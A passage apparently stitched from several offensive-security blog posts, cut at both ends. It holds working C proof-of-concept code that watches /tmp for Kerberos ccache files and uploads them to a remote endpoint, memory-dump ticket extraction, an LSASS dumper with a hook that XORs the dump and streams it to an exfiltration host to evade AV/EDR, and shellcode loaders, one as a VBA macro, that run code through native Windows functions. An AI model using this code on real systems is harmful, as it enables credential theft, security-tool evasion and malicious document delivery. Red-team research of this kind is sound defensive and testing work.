CURLcode res;
struct stat file_info;
FILE *fd;
fd = fopen(filename, "rb");
if(!fd){
return -1;
}
if(fstat(fileno(fd), &file_info) != 0) {
fclose(fd); /* do not leak the file on error */
return -1;
}
curl = curl_easy_init();
if (curl){
curl_easy_setopt(curl, CURLOPT_URL, endpoint);
curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
curl_easy_setopt(curl, CURLOPT_READDATA, fd);
res = curl_easy_perform(curl);
if (res != CURLE_OK) {
curl_easy_cleanup(curl); /* release the handle and the file on error */
fclose(fd);
return -1;
}
curl_easy_cleanup(curl);
}
fclose(fd);
return 0;
}
int main(int argc, char **argv){
int length, i= 0, wd;
int fd;
char buffer[BUF_LEN];
char *ticketloc = NULL;
printf("[Kerberos ccache exfiltrator PoC]\n\n");
//Initiate inotify
if ((fd = inotify_init()) < 0) {
printf("Could not initiate inotify!!\n");
return -1;
}
//Add a watcher for the creation or modification of files at /tmp folder
if ((wd = inotify_add_watch(fd, "/tmp", IN_CREATE | IN_MODIFY)) == -1) {
printf("Could not add a watcher!!\n");
return -2;
}
//Main loop
while(1) {
i = 0;
length = read(fd, buffer, BUF_LEN);
if (length < 0) {
return -3;
}
while (i < length) {
struct inotify_event *event = (struct inotify_event *)&buffer[i];
if (event->len) {
//Check for prefix
if (strncmp(event->name, "krb5cc_", strlen("krb5cc_")) == 0){
printf("New cache file found! (%s)", event->name);
asprintf(&ticketloc, "/tmp/%s",event->name);
//Forward it to us
if (exfiltrate(ticketloc) != 0) {
printf(" - Failed!\n");
}
else {
printf(" - Exfiltrated!\n");
}
free(ticketloc);
}
}
i += EVENT_SIZE + event->len; /* always advance, even for events without a name */
}
}
}
If the ticket is only cached by the process (because no other process needs to access it), it is possible to retrieve it from a memory dump. In the paper that we mentioned earlier (Kerberos Credential Thievery (GNU/Linux)) the authors scan the dumped memory with a sliding window the size of the keyblock and ticket, and then calculate the entropy of those frames to find plausible candidates. A ccache file is recreated from each candidate and tried until all possibilities are exhausted.
In our humble opinion this method is a bit overkill and convoluted. A far simpler technique is to scan the dumped memory for a pattern inside the krb5_creds structure, then locate the pointers to the keyblock and ticket, extract them and create a ccache file. Let’s explain it.
As we said before, a krb5_creds structure has this definition:
typedef struct _krb5_creds {
krb5_magic magic;
krb5_principal client; /**< client's principal identifier */
krb5_principal server; /**< server's principal identifier */
krb5_keyblock keyblock; /**< session encryption key info */
krb5_ticket_times times; /**< lifetime info */
krb5_boolean is_skey; /**< true if ticket is encrypted in
another ticket's skey */
krb5_flags ticket_flags; /**< flags in ticket */
krb5_address **addresses; /**< addrs in ticket */
krb5_data ticket; /**< ticket string itself */
krb5_data second_ticket; /**< second ticket, if related to
ticket (via DUPLICATE-SKEY or
ENC-TKT-IN-SKEY) */
krb5_authdata **authdata; /**< authorization data */
} krb5_creds;
And krb5_keyblock is defined as:
typedef struct _krb5_keyblock {
krb5_magic magic;
krb5_enctype enctype;
unsigned int length;
krb5_octet *contents;
} krb5_keyblock;
If everything is OK, the magic value will be zero, and the enctype is a known value that depends on the encryption used (for example, 0x17 is rc4-hmac, 0x12 is aes256-sha1, etc.), so only a small subset of values is valid (you can find them all here; there are fewer than 20). The key length is also fixed for a given enctype (a well-known value such as 32 bytes). If we translate this structure to its memory layout, it starts with 00000000 XX000000 YY00000000000000, where XX is the enctype and YY the length. So, for example, if we request a ticket with aes256-sha1, our krb5_keyblock structure will start with 00000000120000002000000000000000. And this is a pattern that we can use as a reference :)
pwndbg> search -x "00000000120000002000000000000000"
[stack] 0x7fffffffdb78 0x1200000000
Here is the beginning of our krb5_keyblock (which is inside the krb5_creds). So, at this address plus 16 bytes, we find the pointer to the keyblock contents (krb5_octet *contents):
pwndbg> x/1g 0x7fffffffdb78+16
0x7fffffffdb88: 0x000055555956f3e0
So now we can retrieve the keyblock contents:
pwndbg> x/4g 0x000055555956f3e0
0x55555956f3e0: 0x77a5e74f160548a7 0x49980e2202bb7c46
0x55555956f3f0: 0x6e2d067a19e01e0d 0x79a3a2f8503cd0d0
Recall that krb5_creds uses a krb5_data structure to hold the ticket information (magic, length and pointer to the ticket itself). This pointer to the ticket data is at our pattern plus 64 bytes:
pwndbg> x/1g 0x7fffffffdb78+64
0x7fffffffdbb8: 0x000055555956ea00
And finally our desired ticket:
pwndbg> x/100x 0x000055555956ea00
0x55555956ea00: 0x61 0x82 0x04 0x6f 0x30 0x82 0x04 0x6b
0x55555956ea08: 0xa0 0x03 0x02 0x01 0x05 0xa1 0x0f 0x1b
0x55555956ea10: 0x0d 0x41 0x43 0x55 0x41 0x52 0x49 0x4f
0x55555956ea18: 0x2e 0x4c 0x4f 0x43 0x41 0x4c 0xa2 0x22
0x55555956ea20: 0x30 0x20 0xa0 0x03 0x02 0x01 0x02 0xa1
0x55555956ea28: 0x19 0x30 0x17 0x1b 0x06 0x6b 0x72 0x62
0x55555956ea30: 0x74 0x67 0x74 0x1b 0x0d 0x41 0x43 0x55
...
The size is located just before the pointer, so you can retrieve it to know how much memory to dump.
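The manual steps above can be sketched in C. This is a minimal sketch and not code from the original research: the helper names (build_keyblock_pattern, find_pattern, read_le32, read_le64) are ours, and it assumes a little-endian x86-64 dump where the padding after the length field is zero, as in the pwndbg session. The offsets 16 and 64 are the ones measured above, and the 4-byte ticket length sits right before the ticket pointer, at offset 60.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KEYBLOCK_PATTERN_LEN 16
#define KEY_PTR_OFFSET 16     /* krb5_octet *contents, relative to the pattern */
#define TICKET_LEN_OFFSET 60  /* krb5_data.length of the ticket */
#define TICKET_PTR_OFFSET 64  /* krb5_data.data of the ticket */

/* Build the 16 bytes expected at the start of a krb5_keyblock:
 * magic (0), enctype and length as little-endian 32-bit values,
 * followed by 4 padding bytes that we assume to be zero. */
void build_keyblock_pattern(uint32_t enctype, uint32_t keylen,
                            unsigned char out[KEYBLOCK_PATTERN_LEN])
{
    memset(out, 0, KEYBLOCK_PATTERN_LEN);
    for (int i = 0; i < 4; i++) {
        out[4 + i] = (unsigned char)(enctype >> (8 * i));
        out[8 + i] = (unsigned char)(keylen >> (8 * i));
    }
}

/* Return the offset of the first match inside the dump, or -1 if none. */
long find_pattern(const unsigned char *dump, size_t dump_len,
                  const unsigned char *pat, size_t pat_len)
{
    if (pat_len == 0 || dump_len < pat_len)
        return -1;
    for (size_t i = 0; i + pat_len <= dump_len; i++) {
        if (memcmp(dump + i, pat, pat_len) == 0)
            return (long)i;
    }
    return -1;
}

/* Read a little-endian 32-bit value (e.g. the ticket length). */
uint32_t read_le32(const unsigned char *p)
{
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* Read a little-endian 64-bit value (a pointer stored in the dump). */
uint64_t read_le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}
```

Keep in mind that the values returned by read_le64 are virtual addresses of the dumped process, so they still have to be translated to offsets inside the dump (for example with the memory map of the core file) before the key and ticket bytes can be copied out.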
Programs can use in-kernel storage (keyrings) because it offers far more protection than ccache files. This kind of storage has the advantage that only the owning user can access the information, via keyctl. To steal those juicy tickets we can inject a small stub of code into processes owned by each user on the compromised machine, and this code will request the tickets. Easy peasy!
Our friend @Zer1t0 developed a tool called Tickey that does all this job for us:
➜ working# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in vagrant[1000] session...
[+] Successful injection at process 15547 of vagrant[1000],look for tickets in /tmp/__krb_1000.ccache
[*] Trying to inject in pelagia[1120601337] session...
[+] Successful injection at process 58779 of pelagia[1120601337],look for tickets in /tmp/__krb_1120601337.ccache
[*] Trying to inject in aurelia[1120601122] session...
[+] Successful injection at process 15540 of aurelia[1120601122],look for tickets in /tmp/__krb_1120601122.ccache
[X] [uid:0] Error retrieving tickets
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how we overcame an AV/EDR which, in spite of not being able to detect the LSASS memory dump process itself, detected the signature of the dump file and decided to mark it as malicious. So we decided to modify the behavior of MiniDumpWriteDump. Please, take a seat and listen to the story.
As you may already know, MiniDumpWriteDump receives, among other arguments, a handle to an already opened or created file.
This is a PoC about how to overcome the limitation imposed by this function, which will take care of the whole memory-read/write-buffer-to-file process.
It is recommended to perform this dance making use of API unhooking to make direct SYSCALLS to avoid AV/EDR hooks in place, as explained in the useful Dumpert by Outflanknl, or by any other evasion method. There are a lot of good resources explaining the topic, so we are not going to cover it here.
During a Red Team assessment we ran into a weird situation where an AV/EDR, which we thought we had already bypassed, was erasing the dump file generated from the LSASS process memory.
MiniDumpWriteDump’s signature is as follows:
BOOL MiniDumpWriteDump(
HANDLE hProcess,
DWORD ProcessId,
HANDLE hFile,
MINIDUMP_TYPE DumpType,
PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,
PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,
PMINIDUMP_CALLBACK_INFORMATION CallbackParam
);
as per the MSDN API documentation
Once the function is called, the file provided as the hFile parameter will be filled with the memory of the LSASS process, as an MDMP format file.
MiniDumpWriteDump takes care of all the magic related to acquiring process memory and writing it to the provided file. So nice of it!
However, this kind of automated process leaves us with no control whatsoever over the memory buffer written to the file.
We thought it might be nice to have a way to overcome such a limitation.
To inspect the internals, we’ll fire up WinDbg with a rather simple LSASS dumper implementation that makes use of the well-known MiniDumpWriteDump.
This implementation requires the LSASS process PID as a parameter. Calling it will produce a full memory dump saved to c:\test.dmp. Simple as that. This .dmp file can be processed with the usual tools.
#include <stdio.h>
#include <Windows.h>
#include <DbgHelp.h>
#pragma comment (lib, "Dbghelp.lib")
void minidumpThis(HANDLE hProc)
{
const wchar_t* filePath = L"C:\\test.dmp";
HANDLE hFile = CreateFileW(filePath, GENERIC_ALL, 0, nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, nullptr);
if (hFile == INVALID_HANDLE_VALUE) // CreateFile signals failure with INVALID_HANDLE_VALUE, not NULL
{
printf("No dump for you. Wrong file\n");
}
else
{
DWORD lsassPid = GetProcessId(hProc);
printf("Got PID:: %i\n", lsassPid);
BOOL Result = MiniDumpWriteDump(hProc, lsassPid, hFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
CloseHandle(hFile);
if (!Result)
{
printf("No dump for you. Minidump failed\n");
}
}
return;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation = { 0 };
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
BOOL SetDebugPrivilege() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES TokenPrivileges = { 0 };
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
return FALSE;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
const wchar_t *lpwPriv = L"SeDebugPrivilege";
if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
CloseHandle(hToken);
printf("I dont have SeDebugPirvs\n");
return FALSE;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
CloseHandle(hToken);
printf("Could not adjust to SeDebugPrivs\n");
return FALSE;
}
CloseHandle(hToken);
return TRUE;
}
int main(int argc, char* args[])
{
DWORD lsassPid = atoi(args[1]);
HANDLE hProcess = NULL;
if (!IsElevated()) {
printf("not admin\n");
return -1;
}
if (!SetDebugPrivilege()) {
printf("no SeDebugPrivs\n");
return -1;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, lsassPid);
minidumpThis(hProcess);
CloseHandle(hProcess);
return 0;
}
Once the dumper is compiled and loaded into WinDbg, we place some breakpoints to aid us in the process:
bp miniDumpWriteDump // Breakpoint at miniDumpWriteDump address
g // go (continue execution)
p // step-in
bp NtWriteFile // Breakpoint at NtWriteFile
g // go (continue execution)
k // and, finally, print the backtrace
Taking a look at the backtrace produced once the execution flow reaches NtWriteFile, we can see that the last call inside dbgcore.dll, before letting the OS take care of the file-writing process, is made from a function called WriteAll that lives inside Win32FileOutputProvider.
However, this function is not publicly available to use, as the DLL doesn’t export it. By inspecting the library and its base address, we can easily determine the function offset, which seems to be 0xb4b0 (offset = abs_address - base_address).
By peeking a little bit more into the WriteAll function, we determined that the arguments passed to it were:
Inspecting the memory at the address held in rdx, we can see the beginning of the dump file.
Therefore, it should be fairly straightforward to hook into this function to access the buffer and modify it as needed.
The idea of a hook is to modify the “normal” execution flow of an application. Among others, function hooks are placed by many AV/EDR providers in order to monitor certain function calls to discover undesired behaviors.
In this case, to detour the function execution, we wrote directly to memory at the WriteAll address. This function is called over and over during the dump process, likely to split the memory writes into smaller pieces and to retrieve different parts of the process being dumped, which forces us to restore the original bytes after every detoured call.
Originally, it would look like this:
Note that our primary intention here is not to re-implement the WriteAll function, but to modify the buffer, then restore the original overwritten bytes, and finally call WriteAll to let it do its job with the new buffer.
The simplest way to achieve this is to make the execution flow jump as soon as it reaches WriteAll:
mov r10, <__TRAMPOLINE_ADDRESS>
jmp r10
Those assembly lines translate to the following opcodes, to be written at the beginning of the WriteAll function:
uint8_t trampoline_assembly[13] = {
0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
0x41, 0xFF, 0xE2 // jmp r10
};
Where all those 0x00 should be replaced by the _trampoline function address.
Which translates to something as simple as:
const char* dbgcore_name = "dbgcore.dll";
intptr_t dbgcore_handle = (intptr_t)LoadLibraryA(dbgcore_name);
intptr_t writeAll_offset = 0xb4b0;
writeAll_abs = dbgcore_handle + writeAll_offset;
void* _hoot_trampoline_address = (void*)_hoot_trampoline;
memcpy(&trampoline_assembly[2], &_hoot_trampoline_address, sizeof(_hoot_trampoline_address));
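Since the original bytes have to be restored on every call, it helps to save them before writing the jump. The following is a minimal, portable sketch of that bookkeeping, not the PoC's code: the helper names (build_trampoline, install_hook, remove_hook) are ours, and it works on a plain byte buffer. Against the real WriteAll the target memory is code, so it has to be made writable first or be written through WriteProcessMemory, as the trampoline does.

```c
#include <stdint.h>
#include <string.h>

#define HOOK_LEN 13

/* Encode `mov r10, target; jmp r10` (x86-64) into out. */
void build_trampoline(uint64_t target, uint8_t out[HOOK_LEN])
{
    out[0] = 0x49; out[1] = 0xBA;                 /* mov r10, imm64 */
    for (int i = 0; i < 8; i++)                   /* imm64 is little-endian */
        out[2 + i] = (uint8_t)(target >> (8 * i));
    out[10] = 0x41; out[11] = 0xFF; out[12] = 0xE2; /* jmp r10 */
}

/* Save the first HOOK_LEN bytes of func, then overwrite them with the jump. */
void install_hook(uint8_t *func, uint8_t saved[HOOK_LEN], uint64_t target)
{
    uint8_t jump[HOOK_LEN];
    memcpy(saved, func, HOOK_LEN);
    build_trampoline(target, jump);
    memcpy(func, jump, HOOK_LEN);
}

/* Put the original bytes back so the real function can run again. */
void remove_hook(uint8_t *func, const uint8_t saved[HOOK_LEN])
{
    memcpy(func, saved, HOOK_LEN);
}
```

The saved array plays the role of the overwritten_writeAll buffer that the trampoline uses to restore the function.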
As stated before, the _trampoline should implement the following logic:
- Perform the required buffer operations (such as encryption or exfiltration)
- Restore the original overwritten bytes from `WriteAll`.
- Call the original `WriteAll` function with the modified buffer.
- Write the hook again in the `WriteAll` function.
UINT32 _hoot_trampoline(HANDLE file_handler, void* buffer, INT64 size) {
// The position calculation lines will make sense in the Prowlblems section ^o^
LONG high_dword = 0;
DWORD low_dword = SetFilePointer(our_dmp_handle, 0, &high_dword, FILE_CURRENT);
// Widen before shifting: LONG is 32 bits on Windows, so shifting it by 32 is undefined
LONGLONG pos = ((LONGLONG)high_dword << 32) | low_dword;
unsigned char *new_buff = hoot(buffer, size, pos); // Perform buffer operations: Encrypt, nuke, send it...
// Restore the original WriteAll bytes so the real function can be called
WriteProcessMemory(hProcess,
(LPVOID*)writeAll_abs,
&overwritten_writeAll,
sizeof(overwritten_writeAll),
NULL
); // Restore original bytes
/* Call the WriteAll absolute address (cast it to a function that
returns an UINT32 and
receives a HANDLE, a pointer to a buffer and an INT64)
*/
UINT32 ret = ( (UINT32(*)(HANDLE, void*, INT64) ) (writeAll_abs) ) (file_handler, (void*)new_buff, size); // erg...
// Rewrite the hook at the beginning of the WriteAll
WriteProcessMemory(hProcess, (LPVOID*)writeAll_abs, &trampoline_assembly, sizeof(trampoline_assembly), NULL);
return ret;
}
The hoot function may implement a variety of modifications or operations on the buffer it receives. In this PoC we just XOR the contents of the buffer with a single byte and send it over a socket connection to a receiving server. It also provides a simple in-memory buffer nuke to avoid writing any of the actual buffer contents to disk.
This proved to be more than enough to prevent any AV/EDR solution from removing the dump file from the computer.
unsigned char* hoot(void* buffer, INT64 size, long pos) {
unsigned char* new_buff = (unsigned char*) buffer;
if (USE_ENCRYPTION) {
new_buff = encrypt(buffer, size, XOR_KEY);
}
if (EXFIL) {
s = getRawSocket(EXFIL_HOST, EXFIL_PORT);
if(s) {
sendBytesRaw(s, (const char*)new_buff, size, pos);
}
else {
printf("[!] ERR:: SOCKET NOT READY\n");
}
}
if (!WRITE_TO_FILE) {
memset(new_buff, 0x00, size);
}
return new_buff;
}
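The encrypt helper is not shown here, so the following is only a hypothetical stand-in for it: a single-byte XOR applied in place (the real helper returns a pointer and may work differently). It is enough to illustrate why the written file no longer carries a recognizable MDMP header.

```c
#include <stddef.h>

/* XOR every byte of buf in place with a single-byte key.
 * Applying the same key twice restores the original contents. */
void xor_buffer(unsigned char *buf, size_t size, unsigned char key)
{
    for (size_t i = 0; i < size; i++)
        buf[i] ^= key;
}
```

On the receiving side the same function with the same key recovers the original dump, which can then be processed with the usual tools.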
Once the exfiltration/encryption tasks were coded and we started testing, we realized that the WriteAll function was not creating the dump sequentially. It was actually making NtWriteFile jump all over the file, writing bytes here and there by setting an offset to write to.
__kernel_entry NTSYSCALLAPI NTSTATUS NtWriteFile(
HANDLE FileHandle,
HANDLE Event,
PIO_APC_ROUTINE ApcRoutine,
PVOID ApcContext,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID Buffer,
ULONG Length,
PLARGE_INTEGER ByteOffset, // Right here O^O
PULONG Key
);
After a nice talk with @TheXC3LL, he found this nifty little trick to find out where the cursor is in the file handle received by our _trampoline function: Get current cursor location on a file pointer
LONG high_dword = 0;
DWORD low_dword = SetFilePointer(our_dmp_handle, 0, &high_dword, FILE_CURRENT);
// Widen before shifting: LONG is 32 bits on Windows, so shifting it by 32 is undefined
LONGLONG pos = ((LONGLONG)high_dword << 32) | low_dword;
Once we have the position, we can easily tell our receiving server where in the file it should place the received buffer, by sending a message composed of the offset, the size of the modified buffer, and the modified buffer itself. This gives us a simple protocol:
4B 4B <SIZE>B
<OFFSET><SIZE><BUFFFFFFFFFFFER>
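A minimal sketch of this framing in C follows. The function names (pack_frame, apply_frame) are ours and the little-endian byte order of the two 4-byte fields is an assumption, since the layout above does not state it. The receiver side is shown writing into an in-memory image of the file rather than a real file, to keep the example self-contained.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FRAME_HEADER_LEN 8 /* 4-byte offset + 4-byte size */

void put_le32(unsigned char *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Sender: build <OFFSET><SIZE><BUFFER> in out, which must hold
 * FRAME_HEADER_LEN + size bytes. Returns the frame length. */
size_t pack_frame(uint32_t offset, const unsigned char *buf, uint32_t size,
                  unsigned char *out)
{
    put_le32(out, offset);
    put_le32(out + 4, size);
    memcpy(out + FRAME_HEADER_LEN, buf, size);
    return FRAME_HEADER_LEN + (size_t)size;
}

/* Receiver: copy the payload to its offset inside the file image.
 * Returns 0 on success, -1 if the frame is truncated or does not fit. */
int apply_frame(const unsigned char *frame, size_t frame_len,
                unsigned char *file, size_t file_len)
{
    if (frame_len < FRAME_HEADER_LEN)
        return -1;
    uint32_t offset = get_le32(frame);
    uint32_t size = get_le32(frame + 4);
    if (frame_len - FRAME_HEADER_LEN < size)
        return -1;
    if (offset > file_len || size > file_len - offset)
        return -1;
    memcpy(file + offset, frame + FRAME_HEADER_LEN, size);
    return 0;
}
```

Because every frame carries its own offset, the receiver can rebuild the dump correctly even though WriteAll does not write it sequentially. Note that a 4-byte offset limits this scheme to dumps smaller than 4 GB.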
SharpMiniDump with NTFS transactions by PorLaCola25 based on b4rtik’s SharpMiniDump
Lsass Minidump file seen as Malicious by McAfee AV by K4nfr3
Although this wasn’t an incredible discovery, playing with memory is always fun ^o^. Also, if you made it to the end of this article, you might want the full code of this PoC. Available as usual in our GitHub, Adepts-Of-0xCC
Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about how we can (ab)use different native Windows functions to copy our shellcode to a RWX section in our VBA Macros.
The topic is old and basic, but with the recent analysis of the Lazarus’ maldocs it feels like discussing this technique may come in handy at this moment.
As shown by NCC in their article “RIFT: Analysing a Lazarus Shellcode Execution Method”, Lazarus Group used maldocs where the shellcode is loaded and executed without calling any of the classical functions. To achieve this, the VBA macro used UuidFromStringA to copy the shellcode to the RWX region and then triggered its execution via lpLocaleEnumProc. The lpLocaleEnumProc trick was previously documented by @noottrak in his article “Abusing native Windows functions for shellcode execution”.
Using alternative ways to copy the shellcode is nothing new; there are even a few articles discussing it for inter-process injections (Inserting data into other processes’ address space by @Hexacorn, GetEnvironmentVariable as an alternative to WriteProcessMemory in process injections by @TheXC3LL and Windows Process Injection: Command Line and Environment Variables by @modexpblog, just to mention a few).
Returning to @noottrak’s article, we can find a list of different native functions which can be used to trigger the execution, and even a tool to build maldocs where the functions used to allocate, copy, and execute the shellcode are randomly chosen. Quoted from the article:
I’m calling trigen (think 3 combo-generator) which randomly puts together a VBA macro using API calls from pools of functions for allocating memory (4 total), copying shellcode to memory (2 total), and then finally abusing the Win32 function call to get code execution (48 total - I left SetWinEventHook out due to aforementioned need to chain functions). In total, there are 384 different possible macro combinations that it can spit out.
The tool uses only 2 native functions to copy the shellcode, when there are dozens of them that can be used. So the number of possible combinations can grow A LOT.
In an extremely abstract way, we can sort the functions that can be (ab)used into two families: one-shot functions and two-shot functions. The first family contains those that let you copy the shellcode directly to the desired address (for example, UuidFromStringA, used by Lazarus); meanwhile, two-shot functions are those where the copy has to be done in two steps: first copy the shellcode to no man’s land, and then retrieve it (for example, SetEnvironmentVariable/GetEnvironmentVariable).
Most of the functions falling into the one-shot category are functions used to convert info from format “A” to format “B”, or those applying some kind of transformation to this info. These functions can be spotted by checking their arguments: if a function receives an input buffer and an output buffer, it is a good candidate. Let’s check LdapUTF8ToUnicode, for example:
WINLDAPAPI int LDAPAPI LdapUTF8ToUnicode(
LPCSTR lpSrcStr,
int cchSrc,
LPWSTR lpDestStr,
int cchDest
);
So, the parameters are:
lpSrcStr - A pointer to a null-terminated UTF-8 string to convert.
lpDestStr - A pointer to a buffer that receives the converted Unicode string, without a null terminator.
This is a good candidate that meets our criteria. We can test it with a simple PoC in C:
#include <Windows.h>
#include <Winldap.h>
#pragma comment(lib, "wldap32.lib")
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xec\xb3\x8c\xec\xb3\x8c"; // \xcc\xcc\xcc\xcc in UNICODE
LPWSTR copied_shellcode = NULL;
HANDLE heap = NULL;
int ret = 0;
int size = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
size = LdapUTF8ToUnicode(orig_shellcode, strlen(orig_shellcode), NULL, 0); // First call is to know the size
ret = LdapUTF8ToUnicode(orig_shellcode, strlen(orig_shellcode), copied_shellcode, size);
EnumSystemCodePagesW(copied_shellcode, 0); // Just to trigger the execution. Taken from Nootrak article.
return 0;
}
As this function works doing a conversion from UTF-8 to UNICODE, we have to craft our shellcode (in this case just a bunch of int3) keeping this in mind.
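To see where the bytes \xec\xb3\x8c come from, here is a minimal sketch (the helper name is ours, it is not part of the PoC) that encodes one 16-bit word of the desired output as UTF-8. It assumes the shellcode is handled as a sequence of 16-bit UTF-16 code units, which is how the converted output is laid out in memory.

```c
#include <stddef.h>
#include <stdint.h>

/* Encode one UTF-16 code unit (a BMP code point) as UTF-8.
 * Returns the number of bytes written (1 to 3), or 0 for surrogate
 * values (0xD800-0xDFFF), which cannot be encoded on their own. */
size_t utf8_from_utf16_unit(uint16_t unit, unsigned char out[3])
{
    if (unit >= 0xD800 && unit <= 0xDFFF)
        return 0;
    if (unit < 0x80) {
        out[0] = (unsigned char)unit;
        return 1;
    }
    if (unit < 0x800) {
        out[0] = (unsigned char)(0xC0 | (unit >> 6));
        out[1] = (unsigned char)(0x80 | (unit & 0x3F));
        return 2;
    }
    out[0] = (unsigned char)(0xE0 | (unit >> 12));
    out[1] = (unsigned char)(0x80 | ((unit >> 6) & 0x3F));
    out[2] = (unsigned char)(0x80 | (unit & 0x3F));
    return 3;
}
```

For the word 0xCCCC (two int3 bytes) this yields EC B3 8C, matching the string used in the PoC. Words that fall in the surrogate range, or a zero word (which becomes a NUL byte in the source string), cannot be produced this way, so real shellcode would need some care or a different copy function.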
As we saw, it worked. It is time to translate the C code to the impious language of Mordor VBA:
Private Declare PtrSafe Function HeapCreate Lib "KERNEL32" (ByVal flOptions As Long, ByVal dwInitialSize As LongPtr, ByVal dwMaximumSize As LongPtr) As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongPtr) As LongPtr
Private Declare PtrSafe Function EnumSystemCodePagesW Lib "KERNEL32" (ByVal lpCodePageEnumProc As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function LdapUTF8ToUnicode Lib "WLDAP32" (ByVal lpSrcStr As LongPtr, ByVal cchSrc As Long, ByVal lpDestStr As LongPtr, ByVal cchDest As Long) As Long
Sub poc()
Dim orig_shellcode(0 To 5) As Byte
Dim copied_shellcode As LongPtr
Dim heap As LongPtr
Dim size As Long
Dim ret As Long
Dim HEAP_CREATE_ENABLE_EXECUTE As Long
HEAP_CREATE_ENABLE_EXECUTE = &H40000
'\xec\xb3\x8c\xec\xb3\x8c ==> \xcc\xcc\xcc\xcc
orig_shellcode(0) = &HEC
orig_shellcode(1) = &HB3
orig_shellcode(2) = &H8C
orig_shellcode(3) = &HEC
orig_shellcode(4) = &HB3
orig_shellcode(5) = &H8C
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0)
copied_shellcode = HeapAlloc(heap, 0, &H10)
size = LdapUTF8ToUnicode(VarPtr(orig_shellcode(0)), 6, 0, 0)
ret = LdapUTF8ToUnicode(VarPtr(orig_shellcode(0)), 6, copied_shellcode, size)
ret = EnumSystemCodePagesW(copied_shellcode, 0)
End Sub
Attach a debugger and run the macro!
Another example is PathCanonicalize:
BOOL PathCanonicalizeA(
LPSTR pszBuf,
LPCSTR pszPath
);
The parameters meet our criteria:
pszBuf - A pointer to a string that receives the canonicalized path. You must set the size of this buffer to MAX_PATH to ensure that it is large enough to hold the returned string.
pszPath - A pointer to a null-terminated string of maximum length MAX_PATH that contains the path to be canonicalized.
The PoC:
#include <Windows.h>
#include <Shlwapi.h>
#pragma comment(lib, "Shlwapi.lib")
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
LPSTR copied_shellcode = NULL;
HANDLE heap = NULL;
BOOL ret = 0;
int size = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
PathCanonicalizeA(copied_shellcode, orig_shellcode);
EnumSystemCodePagesW(copied_shellcode, 0);
return 0;
}
Aaand fire in the hole!
With this label we are referring to functions that first save the shellcode in an intermediate place (an environment variable, a window title, etc.) and then retrieve it from there. The easiest to spot are the Set/Get twins.
A simple example that comes to mind is saving the shellcode as a console title with SetConsoleTitleA and then calling GetConsoleTitleA to copy it into our RWX region:
#include <Windows.h>
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
LPSTR copied_shellcode = NULL;
HANDLE heap = NULL;
BOOL ret = 0;
heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
copied_shellcode = HeapAlloc(heap, 0, 0x10);
SetConsoleTitleA(orig_shellcode);
GetConsoleTitleA(copied_shellcode, 0x10); // nSize must not exceed the 0x10 bytes allocated above
EnumSystemCodePagesW(copied_shellcode, 0);
return 0;
}
Test it:
IPC mechanisms can also fall into our “two-shots” category. For example, we can create an anonymous pipe, use it as a no man’s land and call WriteFile/ReadFile to copy the shellcode:
#include <Windows.h>
int main(int argc, char** argv) {
LPCSTR orig_shellcode = "\xcc\xcc\xcc\xcc";
LPSTR copied_shellcode = NULL;
HANDLE heap = NULL;
HANDLE source = NULL;
HANDLE sink = NULL;
SECURITY_ATTRIBUTES saAttr;
DWORD size = 0;
